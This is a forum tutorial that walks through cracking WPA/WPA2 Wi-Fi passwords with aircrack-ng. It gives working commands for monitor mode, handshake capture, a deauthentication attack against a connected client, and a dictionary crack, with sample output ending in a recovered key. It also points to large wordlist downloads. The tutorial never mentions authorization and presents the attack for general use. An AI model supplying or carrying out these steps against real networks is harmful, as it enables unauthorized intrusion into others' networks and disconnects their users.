Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng]

Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng]
Note: This is part 1 of the tutorial covering bruteforcing technique to crack wpa/wpa2 networks. Part 2 is going to cover cracking wpa/wpa2 without bruteforcing, so stay updated with our forum . The tools required for this tutorial are provided at the bottom of this tutorial.
This tutorials will teach you about cracking wpa/wpa2 networks which is using pre-shared keys. But before jumping directly to the tutorial, iguess u guys should know about WPA/WPA2 andthe difference between WEP and WPA, if u dont have any ideas on this topic, then i would suggest you to read some articles about WPA/WPA2 and WEP, thats going to help you a lot.
Before starting make sure airodump-ng shows the network having PSK authentication type, if not then stop ur time wasting cracking because aircrack-ng can only crack pre-shared keys.
I also got asked several times whether we can crack WPA like WEP and the answer i gave was NO, because while cracking WEP, stastistical method can be used to speed op cracking, but WPA only depends upon BRUTE-FORCING ( There's an exception though, which i will be showing on Part-2 of cracking wpa/wpa2 networks) .
So here is the points you should note down:

1) The passphrase or password must be in the dicitionary list u are going to use for Brute-forcing.
2) The authentication method between WPA and WPA2 networks are almost same, so there isno difference between cracking WPA and WPA2.
3) You should be close enough to the network to send and receive wireless client packets.
The steps we are going to Follow are :
Put wireless interface in monitor mode
Start airodump-ng to collect authentication Handshake.
Use aireplay-ng, to deauthenticate the wireless client, after the handshake is captured.
Crack the key using a dictionary file by running aircrack-ng.
Putting wireless interface in monitor mode
Put card in monitor mode, run the following command.
Quote:
Quote: airmon-ng
Then the system will show this,

Quote: Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
Enter following command to start wireless card on monitor mode.(For mac drivers )
Quote: airmon-ng start wlan0
Then the system will respond,
Quote: Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Enter following command to start wireless card on monitor mode.(For other drivers)
Quote: airmon-ng start ardha
Replace ardha with your interface name.
Now, finding network using WPA/WPA2

Here on above step, monitor mode has been enabled on mon0, note down ur monitor enabled.
Then enter Following command, (replace mon0 with ur monitor enabled)
Quote: airodump-ng mon0
The system will respond,
Quote: CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
In the screen above, notice the “WPA handshake: 00:19:5B:52:AD:F7” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.
Now, lets de-authenciate using aireplay-ng afterthe handshake is complete.
Quote: aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
The output should be,
Quote: 13:04:20 Sending DeAuth to station. STMAC: [00:1C:BF:90:5B:A3]
Now, lets run aircrack-ng to to crack pre-shared Key .
Quote: aircrack-ng –w mypassword.lst -b 00:19:5B:52:AD:F7 psk*.cap
Where:
-w mypassword.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.
If everything is working good and handshakes are found, this is what u are likely to get
Quote: Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
# BSSID ESSID Encryption
1 00:19:5B:52:AD:F7 testnet WPA (1 handshake)
Choosing first network as target.
If handshakes are not found then,
Quote: Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
No valid WPA handshakes found.
Now , aircrack-ng will start attempting to crack the pre-shared key. Depending on ur computer speed and size of password file, cracking may take upto hours and even days.
If everything goes good then this is what cracked pre-shared key looks like:
Aircrack-ng 0.8
Quote: [00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 5985 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
And, thats end of the Tutorial.
Download aircrack from :
[You must be registered and logged in to see this link.]
Collection of wordlist(size:8.49gb) :
[You must be registered and logged in to see this link.]
Collection of wordlist(size:1.9gb) :
[You must be registered and logged in to see this link.]
OR, you can use your own wordlists, if u already have one.
Note: This is part 1 of the tutorial covering bruteforcing techniquq to crack wpa/wpa2 networks. Part 2 is going to cover cracking wpa/wpa2 without bruteforcing, so stay updated with our Forum.
Copyright © Ardhapagal